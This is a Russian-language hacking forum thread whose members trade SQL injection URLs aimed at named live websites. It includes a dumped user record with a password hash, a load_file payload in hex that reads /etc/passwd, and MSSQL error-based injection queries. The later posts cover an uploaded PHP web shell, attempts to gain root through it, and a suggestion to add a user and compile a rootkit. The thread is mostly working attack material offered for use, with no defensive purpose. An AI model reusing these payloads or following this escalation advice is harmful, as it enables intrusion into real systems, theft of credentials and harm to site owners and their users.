Вбиваю я http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7%20from+information_schema.columns+where+table_name=0x7573725f6c6f67696e+limit+1,1/* а мне отображается пустая страница!
В чём проблема то? http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_name=0x757365727461626c65-- usr_id (0) » usr_name (0) » grp_id (0) » usr_login (0) » usr_password (0) http://catalog.vimdivision.ru/index.php?rn_id=-1+union+select+1,concat_ws(0x3a,usr_id,usr_name,grp_id,usr_login,usr_password),3,4,5,6,7+from+usertable+limit+0,1-- 1:Николай:0:aries:b3bd3c36b29a243c9f510720cd417d14
Помогите разобратся, надо знач SMF похекать,делаю все согласно тому что написано тут , но когда захожу на http://site.com/forum/Themes/default/index.php меня перебрасывает на индекс форума, и я посмотрел на других форумах (с данной версий движка) с этого файла также перекидывает на главную форума, версию вроде не фиксили, что я не так делаю, спасибо
Народ 1. load_file(0x2F6574632F706173737764) x2F6574632F706173737764 это какая кодировка? чем или где можно расшифровать? 2. чем или где можно закодировать, расшифровать в 16бит? Заранее спс
2la.painkiller 1.x'hexstring' 2.http://www.bigprism.com/online-tools/base64-hex-ascii-encoder-decoder.html
маза в том что нужно чтобы админ перешёл по линку, когда он будет авторихован и чтобы у него всё сработало))
http://www.svetlana-russkaya.ru/index.php?pid=-101+union+select+1,2,3,4,5,6,7/* Колонки подобраны не правильно,скоре всего http://www.svetlana-russkaya.ru/index.php?pid=7&forf_tid=46+order+by+9/*&forf_page_num=1 помогите аскрутить плиз...
Да просто версия Мускуля - 3-я, у нее нет UNION'a: http://www.svetlana-russkaya.ru/index.php?pid=101+and+substring(version(),1,1)=3 --- Боюсь в третьей версии ничего сделать не выйдет( слишком много ограничений...
хм и почему же ты так решил ? ) http://www.svetlana-russkaya.ru/index.php?pid=101 user=svetlana@localhost database=svetlana version=3.23.58 попробуй найти установочную директорию скрипта может если права на юзера криво выставленны удастся прочитать файлы
Фильтрация запятых Всем привет! Есть вопросы по MSSQL. Есть рабочая уязвимость, например: /?part=npcs&id=1+OR+1=(select+db_name(1))-- и т.д. в db_name -- получаем все базы. В ошибках типа Syntax error converting the varchar value 'ТО ЧТО ИНТЕРЕСОВАЛО' to a column of data type int. вытаскиваются значения таблиц, полей, значений, но только типа varchar... Все другие типы ( int,binary и т.д.) не возвращаются!!! Мозг сломал не пойму, что сделать можно. Пробовал привести искомые значения к типу nvarchar ( чтобы была ошибка преобразования в int). Например : /?part=items&id=1+OR+1=(select+top+1+cast(id+as+nvarchar)+from+sa_names)-- или так /?part=items&id=1+OR+1=(select+top+1+convert(nvarchar,id)+from+sa_names)-- ...значения не возвращаются... И самое паршивое то, что запятые фильтруются даже в url encode %2C....и последний запрос интерпретируется как convert(nvarcharid)... Как-то можно в таком случае, в запросе спровоцировать ошибку приведения типов или как еще....нужно выводить типы int и Binary.... Заранее ОГРОМНОЕ СПАСИБО !!!
Помогите, пожалуйста, разобраться с правами шелла. Суть проблемы: Залил PHPшелл на сайт - права user/user. Некий рутовский процесс скопировал этот сайт в директорию не доступную из web, но доступную из шелла. Соответсвенно скопировал и мой шелл. Поскольку при копировании файлу присваиваются права копирующего, то в этой директории шелл приобрел права root/wheel и доступен на чтение. Я создал в директории доступной из web символическую(мягкую) ссылку на каталог(не на файл) в котором находится рутовский шелл и зашел на него через браузер. В итоге файл-шелл имеет Permission root/wheel, но работает он почему-то на тех же правах user/user. Нифига не пойму. Почему он НЕ работает на правах root? Спасибо.
Пять раз прочел и не совсем понял, скорее всего ты пропустил частицу "не" перед "с правами апача". Если так, то ведь владелец скрипта как раз root/wheel. А может ты пропустил частицу "не" перед "с теми правами владельца..." Тогда нужен шелл на перл или другом языке? на каком? или может скомпилировать программу которая запустится как процесс и выполнит то что мне надо на правах root?
Взял на себя смелость поправить...) Насчёт шелла на перле идея хорошая, только скомпилить прогу с рутовскими правами будет трудно. Как вариант можно попробовать добавить пользователя, а потом от его имени что-то компилить, например руткит...
